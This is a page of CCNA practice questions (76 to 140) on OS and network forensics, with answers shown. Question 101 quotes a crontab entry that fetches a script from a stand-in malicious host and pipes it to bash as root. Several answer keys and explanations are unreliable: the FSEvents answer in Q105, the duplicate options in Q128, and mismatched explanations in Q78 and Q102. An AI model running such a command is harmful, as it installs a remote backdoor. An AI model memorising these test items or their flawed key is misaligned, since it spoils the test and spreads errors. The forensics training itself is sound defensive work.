CCNA OS and Network Forensics Questions

75 of 216 questions · Page 2/3 · OS and Network Forensics · Answers revealed

76
MCQ · easy

Which Windows artifact is primarily used to determine the execution history of applications, including the path and run count?

A. LNK files
B. Jump lists
C. Prefetch files
D. Event logs
Answer: C

Prefetch files contain execution history, path, and run count for applications.

Why this answer

Prefetch files (.pf) store information about recently executed applications, including execution count and timestamps. They are located in C:\Windows\Prefetch.

77
Multi-Select · hard

A security analyst is investigating a potential webshell on an IIS server. Which THREE artifacts are commonly associated with webshell presence?

Select 3 answers
A. Increase in NetFlow traffic to a known good update server
B. Presence of encoded scripts in the web application directory
C. Event ID 4624 logon events from the service account
D. Unusual HTTP POST requests to .asp or .aspx files in IIS logs
E. Process creation events for cmd.exe or powershell.exe spawned by w3wp.exe
Answers: B, D, E

Webshell files are typically stored in web-accessible directories.

Why this answer

Webshells leave traces in IIS logs (HTTP requests), file system (malicious files in web directories), and event logs (process creation or errors).

78
MCQ · medium

An analyst detects a large amount of data being exfiltrated from a network over DNS queries. Which type of network analysis would BEST detect this activity?

A. Proxy log analysis
B. Firewall log analysis
C. Packet capture analysis
D. IDS/IPS log analysis
Answer: C

Packet capture (e.g., with Wireshark) can inspect DNS query content for encoded data, detecting tunneling.

Why this answer

DNS tunneling uses DNS queries to exfiltrate data. NetFlow analysis can identify unusual DNS traffic patterns, such as large or frequent queries to a domain, while packet capture can reveal the content.

79
MCQ · easy

Which Windows Event ID is generated when a new service is installed on a system?

A. 4624
B. 7045
C. 4648
D. 4720
Answer: B

Correct. 7045 is the service install event.

Why this answer

Event ID 7045 in the System log is logged when a service is installed, started, or changed.

80
MCQ · medium

A Linux investigator wants to see all commands run by a user from the bash shell. Which file should be examined?

A. /etc/passwd
B. /var/log/auth.log
C. ~/.bash_history
D. /var/log/syslog
Answer: C

This file stores bash command history.

Why this answer

The .bash_history file in the user's home directory contains the command history for bash.

81
Multi-Select · medium

An analyst is reviewing firewall logs and sees repeated outbound connections from an internal host to a known malicious IP on port 443. Which TWO network forensic data sources would BEST help determine if data exfiltration occurred?

Select 2 answers
A. NetFlow records showing packet sizes and counts
B. Full packet capture (PCAP) of the sessions
C. IDS alerts for signatures
D. Windows security event logs
E. Proxy logs with TLS interception and decrypted content
Answers: B, E

PCAPs allow reconstruction of data streams.

Why this answer

Full packet capture provides payload content, and TLS interception logs show decrypted traffic if available.

82
MCQ · easy

Which Windows Registry hive contains user-specific configuration such as MRU lists and UserAssist artifacts?

A. NTUSER.DAT
B. HKLM\SAM
C. SYSTEM
D. HKLM\System
Answer: A

NTUSER.DAT is the user-specific registry hive.

Why this answer

NTUSER.DAT is the registry hive for user-specific settings, located in %UserProfile%. It contains MRU lists, UserAssist, and other user activity artifacts.

83
MCQ · easy

In Windows forensics, which artifact is used to track recently executed programs on a per-user basis?

A. Jump lists
B. UserAssist
C. ShellBags
D. Prefetch files
Answer: B

UserAssist in NTUSER.DAT logs program executions per user.

Why this answer

UserAssist keys in the NTUSER.DAT hive store information about programs executed via Windows Explorer, including run count and last execution time.

84
MCQ · hard

A forensic analyst finds a suspicious .plist file in /Library/LaunchDaemons/ on a macOS system. The file contains a key "ProgramArguments" with a path to a script in /tmp. Which persistence mechanism does this indicate?

A. Cron job
B. Launch daemon
C. Login item
D. Kernel extension
Answer: B

LaunchDaemons plists in /Library/LaunchDaemons/ define system daemons that run as root at boot.

Why this answer

LaunchDaemons are used for system-wide daemons that start at boot. A plist in /Library/LaunchDaemons/ with ProgramArguments indicates a launch daemon persistence mechanism.

85
MCQ · medium

A security analyst reviews firewall logs and sees repeated outbound connections from an internal server to an external IP on port 443. The server is not supposed to initiate outbound connections. Which action should the analyst take FIRST?

A. Block the external IP at the firewall
B. Ignore the traffic as it is encrypted
C. Disable the server's network connection
D. Investigate the server for signs of compromise
Answer: D

Investigating the server will help determine if it is compromised and what actions to take.

Why this answer

The first step is to investigate the server to determine if it's compromised, as outbound connections could indicate C2 communication.

86
MCQ · hard

A forensic examiner needs to analyze the contents of a Windows prefetch file (.pf) to determine the last execution time of an application. Which tool would BEST accomplish this task?

A. prefetch.exe (built-in Windows tool)
B. ShellBags Explorer
C. PECmd
D. JumpLister
Answer: C

Correct. PECmd is the standard tool for parsing prefetch files.

Why this answer

Prefetch files contain metadata including last run time and run count. Tools like PECmd (from Eric Zimmerman's tools) are designed to parse .pf files forensically.

87
Multi-Select · hard

Which THREE of the following are indicators of a webshell on a compromised web server? (Select THREE.)

Select 3 answers
A. Multiple failed login attempts in auth.log
B. Presence of system commands in web server error logs
C. Unusual files with .asp, .php, or .jsp extensions in web directories
D. Outbound connections from the web server to suspicious IP addresses
E. High CPU usage from the web server process
Answers: B, C, D

Webshells may execute system commands, appearing in error logs if output is not sanitized.

Why this answer

Webshells are malicious scripts uploaded to a web server. Indicators include anomalous file modifications in web directories, unexpected processes from web server user accounts, and outbound connections from the web server to unknown IPs. CPU spikes can occur but are less specific.

88
MCQ · medium

A forensic analyst is examining a Windows system for evidence of a program that runs automatically every time the system starts. Which registry key is commonly used to achieve persistence via the 'Run' key?

A. HKLM\SAM\SAM
B. HKLM\Software\Microsoft\Windows\CurrentVersion\Run
C. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
D. HKLM\SYSTEM\CurrentControlSet\Services
Answer: B

Programs listed under this key run automatically at system startup.

Why this answer

The Run key under HKLM\Software\Microsoft\Windows\CurrentVersion\Run is a common location for programs to execute at startup. Similar keys exist in HKCU.

89
MCQ · medium

A forensic analyst is investigating a Windows system for evidence of USB device usage. Which registry key is MOST useful for determining the first time a USB device was connected and its serial number?

A. HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR
B. HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2
C. HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellBags
D. HKLM\SYSTEM\CurrentControlSet\Enum\USB
Answer: A

USBSTOR contains USB mass storage devices with serial numbers and timestamps.

Why this answer

The USBSTOR registry key under HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR contains subkeys for each USB device, with properties like serial number and first install date.

90
Multi-Select · medium

A forensic analyst is examining a Windows system for evidence of USB device usage. Which TWO registry locations are known to store USB device history?

Select 2 answers
A. HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR
B. HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2
C. HKLM\Software\Microsoft\Windows NT\CurrentVersion\Prefetch
D. HKCU\Software\Microsoft\Windows\CurrentVersion\Run
E. HKLM\SAM\SAM\Domains\Account\Users
Answers: A, B

USBSTOR lists all USB devices that have been connected.

Why this answer

USB device history is stored in USBSTOR and MountPoints2 keys.

91
MCQ · medium

A forensic analyst needs to create a timeline of file system activity from a disk image. Which tool is specifically designed for this purpose and can parse various artifacts such as registry, prefetch, and log files?

A. Wireshark
B. Volatility
C. Plaso (log2timeline)
D. FTK Imager
Answer: C

Plaso creates super timelines from multiple forensic artifacts.

Why this answer

Plaso (log2timeline) is a super timeline tool that parses multiple artifacts to create a comprehensive timeline. Wireshark is for network packets. FTK Imager is for acquisition. Volatility is for memory analysis.

92
MCQ · easy

In network forensics, which tool is commonly used to analyze and visualize NetFlow data to identify network traffic patterns?

A. Wireshark
B. Splunk
C. Nmap
D. SolarWinds NetFlow Traffic Analyzer
Answer: D

Specifically designed to collect and analyze NetFlow data.

Why this answer

Wireshark is a packet analyzer, not a NetFlow analyzer. Nmap scans networks. Splunk can analyze logs but is not specifically a NetFlow tool. SolarWinds NetFlow Traffic Analyzer is designed for NetFlow analysis.

93
MCQ · medium

A security analyst is reviewing firewall logs and notices repeated connection attempts from an internal IP to an external server on TCP port 4444. The internal host is a web server. What is the MOST likely explanation?

A. The web server is serving HTTPS traffic on port 4444
B. The web server is performing DNS queries
C. The web server is being scanned for open ports
D. The web server has a reverse shell connection to a command-and-control server
Answer: D

Outbound connections on non-standard ports (like 4444) from a server often indicate a reverse shell.

Why this answer

Port 4444 is commonly associated with reverse shells (e.g., Metasploit default). A web server making outbound connections to an external server on port 4444 strongly suggests a reverse shell from the web server to a command-and-control (C2) server.

94
MCQ · medium

In Windows registry forensics, which key is examined to identify USB devices that were connected to the system?

A. HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
B. NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2
C. HKLM\SAM\SAM\Domains\Account\Users
D. HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR
Answer: D

USBSTOR enumerates USB storage devices connected to the system.

Why this answer

The USBSTOR key under HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR contains a list of all USB storage devices that have been connected, including their serial numbers.

95
Multi-Select · hard

A security analyst captures network traffic and observes multiple TCP SYN packets sent to a range of IP addresses on port 445, followed by TCP RST packets after 15 seconds. Which THREE indicators suggest this is a network scan?

Select 3 answers
A. The packets are sent to sequential IP addresses in the same subnet
B. No TCP three-way handshake completes for these connections
C. The source IP is from an internal address
D. The same port is targeted across multiple IP addresses
E. The payload contains exploit code for SMB vulnerability
Answers: A, B, D

Scanning often targets sequential or random IPs to find live hosts.

Why this answer

TCP SYN packets to multiple IPs on a single port indicate a port scan. The RST packets after a timeout suggest the targets did not respond, which is common in a sweep. Sequential IPs and the use of port 445 (SMB) are typical of scanning. The lack of established connections and the specific pattern confirm scanning.

96
MCQ · medium

A forensic analyst discovers an unusual entry in the Windows Registry under 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run'. Which persistence mechanism does this represent?

A. Registry Run key persistence
B. Service installation
C. Scheduled task
D. Startup folder
Answer: A

The Run key automatically launches programs at user logon, a common persistence mechanism.

Why this answer

The Run key is a standard location for programs to auto-start when a user logs on. A malicious entry here indicates persistence via registry run keys.

97
Multi-Select · medium

Which TWO Windows Event IDs are associated with successful logon events? (Select two.)

Select 2 answers
A. 4648
B. 4624
C. 4625
D. 7045
E. 4720
Answers: A, B

4648 = A logon was attempted using explicit credentials (successful).

Why this answer

Event ID 4624 indicates successful logon; 4648 indicates a logon using explicit credentials (also successful).

98
MCQ · medium

In a Windows forensic investigation, the analyst wants to determine which USB devices were connected to the system, including the device serial number and first/last connection times. Which registry hive and key should be examined?

A. HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
B. NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2
C. HKLM\SAM\SAM\Domains\Account\Users
D. HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR
Answer: D

This key contains subkeys for each USB storage device with serial number and connection times.

Why this answer

USB device history is stored in the SYSTEM registry hive under USBSTOR, which records device class, serial number, and timestamps.

99
MCQ · hard

A security analyst reviews the following Windows Event log entry: Event ID 4648 with logon type 3, subject user 'CONTOSO\admin', target server 'FS01', target user 'CONTOSO\backupadmin'. What does this event indicate?

A. A user account was created for backupadmin on FS01
B. A service was installed under the backupadmin account
C. An explicit credential logon was performed to access FS01 using the backupadmin account
D. The backupadmin account locked out due to multiple failed attempts
Answer: C

4648 with the explicit credential flag indicates RunAs or similar usage, and logon type 3 confirms a network logon.

Why this answer

Event ID 4648 records when explicit credentials are used to logon, typically for RunAs or scheduled tasks. Logon type 3 indicates network logon. This means admin used backupadmin credentials to access FS01.

100
MCQ · hard

A forensic analyst is examining a Windows system and finds a prefetch file named NOTEPAD.EXE-12345678.pf. What information can be gleaned from this artifact? (Select the BEST answer.)

A. It saves a copy of the application's configuration
B. It logs all network connections made by the application
C. It records the application's execution count and last run time
D. The file contains the user's password for the application
Answer: C

Prefetch stores run count and timestamps.

Why this answer

Prefetch files contain the number of times the application was run, last run time, and a list of files loaded during execution. They do not store network connections or user-specific data.

101
MCQ · medium

During an incident response, an analyst finds the following entry in /etc/crontab: */5 * * * * root /bin/bash -c 'curl -s http://malicious.com/script.sh | bash'. What is the MOST likely purpose of this entry?

A. Persistence mechanism to maintain access
B. Log cleanup tool
C. System backup script
D. Software update process
Answer: A

Correct. This ensures the attacker's code runs repeatedly.

Why this answer

The cron job runs every 5 minutes as root, downloading and executing a script from a remote server. This is a typical persistence mechanism for a backdoor or command-and-control.

102
Multi-Select · medium

Which TWO Windows registry hives are most commonly analyzed during a forensic investigation to determine user activity and system configuration? (Select TWO.)

Select 2 answers
A. HKLM\SAM
B. HKU\.DEFAULT
C. HKLM\COMPONENTS
D. HKLM\BCD
E. HKCU\...\NTUSER.DAT
Answers: A, E

Contains user account information and password hashes.

Why this answer

SAM stores user account hashes, NTUSER.DAT contains user-specific settings, SYSTEM stores system configuration, SOFTWARE stores installed software info.

103
MCQ · medium

During a forensic examination of a macOS system, an investigator wants to review application execution history. Which artifact contains a chronological record of application launches, including timestamps and process IDs?

A. FSEvents
B. com.apple.launchd.plist
C. syslog
D. Unified logging (log command)
Answer: D

Unified logging captures process lifecycle events via the 'log' command.

Why this answer

macOS unified logging provides detailed system activity including application launches. FSEvents records file system changes but not process launches. .plist files may store settings, not execution history.

104
MCQ · hard

An incident responder examines a Linux server and finds a suspicious cron job that runs every minute and executes a script located in /tmp. Which persistence technique does this represent?

A. Kernel rootkit
B. Web shell
C. SSH key backdoor
D. Cron-based persistence
Answer: D

Cron jobs execute at scheduled intervals, used for persistence.

Why this answer

Cron jobs are a common persistence mechanism on Linux. Attackers often use frequent cron jobs to maintain access.

105
MCQ · easy

In a macOS forensic investigation, which log system provides a timeline of high-level system events such as application launches and user logins?

A. syslog
B. FSEvents
C. .plist files
D. Unified logging
Answer: B

FSEvents logs file system events, useful for timeline analysis on macOS.

Why this answer

FSEvents is a macOS logging system that records changes to the file system, including application launches and user logins, providing a timeline of system activity.

106
Multi-Select · medium

A forensic investigator is examining a Linux system compromised via a web application. Which THREE artifacts should the investigator prioritize to determine the attacker's entry point and post-exploitation activities?

Select 3 answers
A. /home/compromised_user/.bash_history
B. /etc/shadow
C. /var/log/auth.log
D. Cron job entries in /etc/crontab
E. Web server access logs (e.g., /var/log/apache2/access.log)
Answers: A, C, E

Bash history shows commands executed by the attacker after gaining access.

Why this answer

The web server logs (access.log) can show the initial exploit request. auth.log may show authentication events if credentials were used. bash_history can reveal commands executed after compromise. Cron jobs are persistence mechanisms, not the entry point. /etc/shadow stores password hashes, not attack details.

107
MCQ · medium

During a forensic examination of a Mac system, an investigator needs to recover a historical record of file system events, such as file modifications and deletions. Which artifact should they examine?

A. .plist files
B. Unified logging
C. Syslog
D. FSEvents
Answer: D

FSEvents is a Mac feature that records changes to the file system, including modifications and deletions.

Why this answer

FSEvents logs file system changes on macOS, recording events like file creation, modification, and deletion in a binary log.

108
Multi-Select · medium

Which TWO of the following are tools commonly used for network forensics analysis? (Select two.)

Select 2 answers
A. tcpdump
B. Autopsy
C. Volatility
D. dd
E. Wireshark
Answers: A, E

tcpdump is a command-line packet capture tool used in network forensics.

Why this answer

Wireshark and tcpdump are standard tools for capturing and analyzing network packets. Volatility is for memory forensics, Autopsy is for disk forensics, and dd is for disk imaging.

109
MCQ · medium

A forensic analyst is examining browser history from a Chrome installation on a Windows system. Where is the Chrome history database typically stored?

A. %APPDATA%\Mozilla\Firefox\Profiles\
B. %WINDIR%\System32\config\
C. %USERPROFILE%\Favorites\
D. %LOCALAPPDATA%\Google\Chrome\User Data\Default\History
Answer: D

This is the default location for Chrome's history database.

Why this answer

Chrome stores history in an SQLite database file named 'History' located in the user's default profile directory under %LOCALAPPDATA%\Google\Chrome\User Data\Default\.

110
MCQ · easy

A security analyst reviews Windows Security Event Log and finds multiple Event ID 4625 entries for a single user account within a few seconds. What does this pattern MOST likely indicate?

A. Service installation
B. Account creation
C. Brute-force password attack
D. Successful logon by the user
Answer: C

Multiple rapid 4625 events indicate repeated failed logins typical of brute force.

Why this answer

Event ID 4625 indicates a failed logon attempt. Multiple rapid failures suggest a brute-force password guessing attack.

111
MCQ · hard

A Windows system has been compromised. The analyst finds a registry run key at HKCU\Software\Microsoft\Windows\CurrentVersion\Run with value name 'UpdateService' pointing to C:\Users\Public\svchost.exe. Why is this particularly suspicious?

A. The path is not typical for svchost.exe, which resides in System32
B. Run keys are only for startup programs, not services
C. The run key is disabled in Windows 10
D. The registry value name 'UpdateService' is too generic
Answer: A

Correct. Svchost should never be in a user profile folder.

Why this answer

The legitimate svchost.exe runs from C:\Windows\System32, not from C:\Users\Public. This is a common masquerading technique where malware uses a system process name in a user-writable location.

112
Multi-Select · medium

During a macOS forensic investigation, which TWO artifacts would be MOST helpful in determining when a file was downloaded from the internet?

Select 2 answers
A. Kernel logs
B. .plist files in ~/Library/Preferences
C. Quarantine database
D. FSEvents
E. Apple Unified Logging
Answers: C, E

Quarantine stores information about downloaded files, including timestamps and origin.

Why this answer

The unified logging system records download events, and the Quarantine database (com.apple.quarantine extended attribute or SQLite DB) tracks downloaded files with timestamps and source URLs.

113
MCQ · hard

A forensic tool parses the Windows registry and reveals that a USB device with VID_0781&PID_5583 was last connected on 2023-10-01. Which registry key is the MOST likely source of this information?

A. HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR
B. HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account
C. HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USB
D. NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs
Answer: A

USBSTOR contains entries for USB mass storage devices, with VID/PID and connection timestamps.

Why this answer

USB device history is stored in the USBSTOR registry key, which enumerates devices by their Vendor ID (VID) and Product ID (PID).

114
MCQ · hard

During a forensic examination of a compromised Windows server, you find a registry key under HKLM\SYSTEM\CurrentControlSet\Services that points to a malicious DLL. Which event ID would have been generated when this service was installed?

A. 7045
B. 4648
C. 4720
D. 4624
Answer: A

7045 is service install.

Why this answer

Event ID 7045 is logged when a new service is installed on Windows.

115
MCQ · medium

A forensic examiner is analyzing a Mac system and wants to review system logs that record various activities, including application launches and kernel events. Which logging system on macOS should be examined?

A. .plist files
B. FSEvents
C. Unified logging (log command)
D. Console.app logs
Answer: C

Centralized logging system for macOS.

Why this answer

Unified logging (via log command) captures system and user activity in a centralized database, replacing traditional syslog.

116
MCQ · medium

An analyst identifies an unknown binary running on a Linux server. Which /proc filesystem entry would provide the command-line arguments used to start the process?

A. /proc/[pid]/maps
B. /proc/[pid]/status
C. /proc/[pid]/environ
D. /proc/[pid]/cmdline
Answer: D

Contains the full command line of the process.

Why this answer

/proc/[pid]/cmdline contains the command-line arguments of the process, null-separated.

117
MCQ · medium

A Linux system administrator notices that the /var/log/auth.log file shows many 'Failed password for root' entries from a single IP address within a short timeframe. Which tool would BEST help the administrator block further access from that IP?

A. nmap
B. iptables
C. tcpdump
D. Wireshark
Answer: B

iptables can add a rule to drop packets from the offending IP.

Why this answer

iptables is a Linux firewall that can block IP addresses. fail2ban can automate this but is not listed; iptables is the direct tool.

118
Multi-Select · medium

A forensic analyst is investigating a Windows system for persistence mechanisms. Which TWO registry locations are commonly used by malware to achieve auto-start? (Select TWO.)

Select 2 answers
A. HKLM\SYSTEM\CurrentControlSet\Services
B. HKLM\SAM\SAM
C. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
D. HKCU\Software\Microsoft\Windows\CurrentVersion\Run
E. HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Answers: D, E

This is the Run key for the current user.

Why this answer

Run keys under HKLM and HKCU are common autorun locations used by malware to start on boot or user login.

119
MCQ · medium

A forensic analyst examining a Windows machine finds a suspicious service named 'SrvMon' installed. The System event log shows Event ID 7045 at the time of compromise. What does this event indicate?

A. A logon attempt failed
B. A user account was created
C. A service was installed
D. A scheduled task was created
Answer: C

Event ID 7045 signals a new service installation.

Why this answer

Event ID 7045 indicates a new service was installed, which is a common persistence mechanism used by malware.

120
MCQ · medium

A security analyst reviews Windows Security Event Logs and finds multiple Event ID 4625 entries from a single source IP address targeting various usernames. Which type of attack is MOST likely occurring?

A. Password spraying attack
B. Brute-force attack on a single account
C. Pass-the-hash attack
D. Kerberoasting attack
Answer: A

Password spraying involves trying a small number of common passwords against many accounts, exactly matching the pattern of multiple usernames from one IP.

Why this answer

Event ID 4625 indicates a failed logon attempt. Multiple failed attempts from one source against different usernames is characteristic of a password spraying attack, where an attacker tries a few common passwords across many accounts.

121
Multi-Select · easy

Which TWO of the following are typical sources of evidence for network forensics? (Select TWO.)

Select 2 answers
A. Windows registry hives
B. bash_history
C. Firewall logs
D. Prefetch files
E. Packet capture (pcap) files
Answers: C, E

Firewall logs record allowed/denied connections and are key network evidence.

Why this answer

Network forensics relies on capturing and analyzing network traffic. Packet captures (pcap) and firewall logs are primary sources. IDS logs and NetFlow are also used, but IDS logs are more security-specific, and NetFlow provides flow data. However, the simplest direct sources are packet captures and firewall logs.

122
MCQ · medium

An incident responder finds a suspicious LNK file in a user's Startup folder on a Windows system. The LNK file's target is "C:\Windows\System32\rundll32.exe" with a command-line argument "javascript:" followed by encoded text. What is the most likely purpose of this shortcut?

A. A shortcut to a network resource that failed
B. Legitimate update mechanism for Microsoft Office
C. A user-created automation script for daily tasks
D. A malicious persistence mechanism to execute payload via script
Answer: D

Rundll32.exe with JavaScript is a known Living-off-the-Land (LotL) technique for malware.

Why this answer

Rundll32.exe executing JavaScript is a known technique for code execution, often used by malware to run scripts for persistence or payload delivery.

123
MCQ · easy

A security analyst reviews Windows Security Event Log and observes Event ID 4625 repeatedly for a single user account from a remote IP address within a short timeframe. What is the MOST likely cause?

A. The user successfully logged on from a remote workstation
B. A brute-force password attack is occurring against that account
C. The user's account was created
D. A service was installed on the system
Answer: B

Repeated failed logons from a remote IP indicate a brute-force attack.

Why this answer

Event ID 4625 indicates a failed logon attempt. Repeated failures from a remote IP suggest a brute-force password guessing attack.

124
MCQ · medium

Which network forensic technique involves analyzing the flow of network traffic to identify patterns and anomalies, often using tools like SiLK or nfdump?

A. Port scanning
B. NetFlow analysis
C. Signature-based detection
D. Deep packet inspection
Answer: B

NetFlow analysis uses flow records to summarize traffic, often used for anomaly detection.

Why this answer

NetFlow analysis examines flow records (e.g., IPFIX, NetFlow) to understand traffic patterns, volumes, and anomalies, using tools like SiLK or nfdump.

125
MCQ · medium

An analyst suspects that an attacker used a web shell to execute commands on a Windows web server. Which Windows event ID should the analyst look for to detect service installation that may have been used for persistence?

A. 7045
B. 4624
C. 4648
D. 4720
Answer: A

Service installation event.

Why this answer

Event ID 7045 indicates a service was installed on the system, which attackers often use to maintain persistence.

126
MCQ · hard

A Windows system's registry key 'HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR' contains a subkey with a serial number. What does this artifact indicate?

A. A USB network adapter was attached
B. A USB storage device was attached
C. A USB printer was attached
D. A USB keyboard was attached
Answer: B

USBSTOR (USB Storage) records storage devices like flash drives.

Why this answer

The USBSTOR registry key records the serial numbers of USB storage devices that have been connected to the system. Its presence indicates a USB device was attached.

127
MCQ · hard

An incident responder is analyzing a Linux system and finds a suspicious process running as root. To determine the full command line and environment variables of the process with PID 1234, which file in the /proc filesystem should she examine?

A. /proc/1234/status
B. /proc/1234/maps
C. /proc/1234/cmdline
D. /proc/1234/fd
Answer: C

cmdline contains the command line arguments of the process, separated by null bytes.

Why this answer

The /proc/[pid]/cmdline file contains the full command line of the process, and /proc/[pid]/environ contains its environment variables. The question asks for both, but cmdline is the file specifically for the command line and is the primary answer here.

128
MCQ · hard

During a forensic investigation of a compromised Linux server, you find the following entry in /var/log/auth.log: 'Mar 10 02:15:30 server sshd[1234]: Failed password for root from 10.0.0.5 port 54321 ssh2'. Which command would you use to extract all failed root login attempts from this log?

A. awk '/Failed password for root/' /var/log/auth.log
B. grep 'Failed password for root' /var/log/auth.log
C. grep 'Failed password for root' /var/log/auth.log
D. grep 'invalid.*root' /var/log/auth.log
Answer: B

This command extracts all lines containing 'Failed password for root', which matches the failed root login attempts.

Why this answer

The grep command can filter lines containing 'Failed password for root' from the auth.log file. The -i flag is unnecessary here: the log text is case-sensitive and the pattern matches it exactly as written.

129
MCQ · hard

A network analyst captures a packet with Wireshark showing a TCP SYN packet from IP 10.0.0.5 to 192.168.1.10 port 443, followed immediately by a SYN-ACK from 192.168.1.10 to 10.0.0.5, then an RST from 10.0.0.5. What does this sequence MOST likely indicate?

A.A man‑in‑the‑middle attack
B.A denial‑of‑service (SYN flood) attack
C.A normal HTTPS session initiation
D.A TCP SYN scan (stealth scan)
Answer: D

Correct. The RST after SYN‑ACK is characteristic of a SYN scan.

Why this answer

A SYN followed by SYN‑ACK and then RST is typical of a port scan where the scanner sends a SYN, receives a SYN‑ACK (port open), and then immediately resets the connection to avoid completing the handshake.

130
Multi-Select · medium

Which TWO of the following tools are primarily used for timeline analysis in digital forensics? (Select TWO.)

Select 2 answers
A.Nmap
B.The Sleuth Kit (mactime)
C.Autopsy
D.Plaso
E.Wireshark
Answers: B, D

The Sleuth Kit includes mactime for creating timelines from disk images.

Why this answer

Plaso (log2timeline) and The Sleuth Kit (with mactime) are both used to create super timelines from file system metadata.

131
Multi-Select · hard

Which THREE of the following are commonly used for persistence on a Windows system? (Choose THREE.)

Select 3 answers
A.LNK files
B.Registry Run keys
C.Service installations
D.Prefetch files
E.Scheduled tasks
Answers: B, C, E

These are common persistence mechanisms that rely on auto-starting programs.

Why this answer

Registry Run keys, scheduled tasks, and service installations are common persistence mechanisms. Prefetch files and LNK files are forensic artifacts but not persistence mechanisms.

132
MCQ · hard

During a forensic examination of a macOS system, you find a file at /private/var/log/system.log and also notice a directory /private/var/db/diagnostics/. What is the significance of these locations?

A.They are both plain-text log files used for system monitoring
B.The diagnostics directory contains binary log data from the unified logging system
C.The diagnostics directory contains compressed archives of system.log
D.These locations are remnants of third-party security software
Answer: B

macOS unified logging stores binary logs in diagnostics, providing detailed forensic data.

Why this answer

The unified logging system in macOS stores log data in /private/var/db/diagnostics/ in a binary format, while /var/log/system.log is a legacy plain-text log. The diagnostics directory contains more detailed logs for forensic analysis.

133
Multi-Select · hard

A security analyst is analyzing network traffic and sees the following: Source IP 10.0.0.1, Destination IP 203.0.113.5, TCP SYN flag set, destination port 445. The analyst suspects a worm propagation attempt. Which TWO additional pieces of evidence would strengthen this conclusion?

Select 2 answers
A.The packet size is exactly 66 bytes, identical to other similar packets
B.Multiple similar SYN packets from 10.0.0.1 to many internal IPs on port 445
C.The source MAC address is from a well-known vendor
D.The packet contains a payload with the string "SMBv2"
E.The destination IP 203.0.113.5 is a known web server
Answers: A, B

Uniform packet sizes often indicate automated scanning tools versus legitimate traffic.

Why this answer

Worm propagation often scans many internal hosts on SMB port 445 (indicating lateral movement) and uses consistent payload sizes. A single SYN to an external IP on port 445 could be a normal file share connection. Internal scanning and similar packet sizes are indicative of automated worm behavior.

134
MCQ · hard

A SOC analyst is analyzing a packet capture from a network where an internal host communicated with a known malicious IP. The analyst uses Wireshark and applies a display filter to isolate all HTTP traffic. Which filter expression should he use?

A.http.request
B.ip.proto == 6
C.tcp.port == 80
D.http
Answer: D

Wireshark's display filter 'http' matches all packets that contain HTTP protocol data.

Why this answer

The correct filter for HTTP traffic in Wireshark is 'http'. Wireshark uses protocol names in lowercase for display filters.

135
MCQ · medium

Which Windows artifact is specifically designed to track the most recently used (MRU) files for specific applications and can be found in the NTUSER.DAT registry hive?

A.Prefetch files
B.Jump Lists
C.MRU lists in the registry
D.LNK files
Answer: C

MRU lists are registry keys that store recently accessed files for applications like Notepad and WordPad.

Why this answer

MRU lists are stored in the NTUSER.DAT hive under various keys, such as Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSavePidlMRU. They track recently opened files.

136
Multi-Select · medium

Which THREE of the following are commonly used network forensic data sources?

Select 3 answers
A.NetFlow logs
B.Prefetch files
C.IDS/IPS alerts
D.Packet captures (PCAP)
E.Windows registry hives
Answers: A, C, D

NetFlow provides metadata about network flows.

Why this answer

Packet captures (PCAP), NetFlow logs, and IDS/IPS logs are all standard network forensic data sources that provide detail on network traffic.

137
MCQ · medium

A forensic analyst is examining a Windows 10 system for evidence of USB device usage. Which registry hive and key path should she check to find a list of USB devices that have been connected to the system?

A.HKLM\SAM\SAM\Domains\Account\Users
B.HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR
C.HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
D.NTUSER.DAT\Software\Microsoft\Windows\ShellNoRoam\BagMRU
Answer: B

This registry key stores information about all USB storage devices ever connected.

Why this answer

USB device history is stored in the SYSTEM hive under CurrentControlSet\Enum\USBSTOR. This key lists all USB storage devices that have been connected.

138
Multi-Select · hard

A security analyst detects suspicious outbound traffic to multiple external IPs on port 443. Which THREE network forensic data sources should be examined to identify the infected host and the nature of the communication?

Select 3 answers
A.Proxy logs
B.IDS/IPS logs
C.Firewall logs
D.Packet captures (PCAP)
E.NetFlow data
Answers: A, B, C

Proxy logs capture HTTP/HTTPS requests, revealing URLs, user agents, and destinations.

Why this answer

Firewall logs, proxy logs, and IDS/IPS logs are essential: firewall logs show allowed/denied connections, proxy logs reveal HTTP/HTTPS traffic details, and IDS/IPS logs detect malicious payloads.

139
MCQ · medium

A forensic analyst finds a file with the .plist extension on a Mac system. What type of artifact is this?

A.Log file
B.Executable binary
C.Email database
D.Property list file
Answer: D

.plist files are property lists used for storing configuration data.

Why this answer

.plist (Property List) files store configuration data for applications and system settings on macOS. They can contain user preferences, recent items, and other forensic artifacts.

140
Multi-Select · medium

Which TWO artifacts are commonly used to identify USB device insertion history on a Windows system? (Select TWO.)

Select 2 answers
A.NTUSER.DAT
B.HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR
C.prefetch files
D.setupapi.dev.log
E.Event ID 7045
Answers: B, D

USBSTOR enumerates USB storage devices that have been connected.

Why this answer

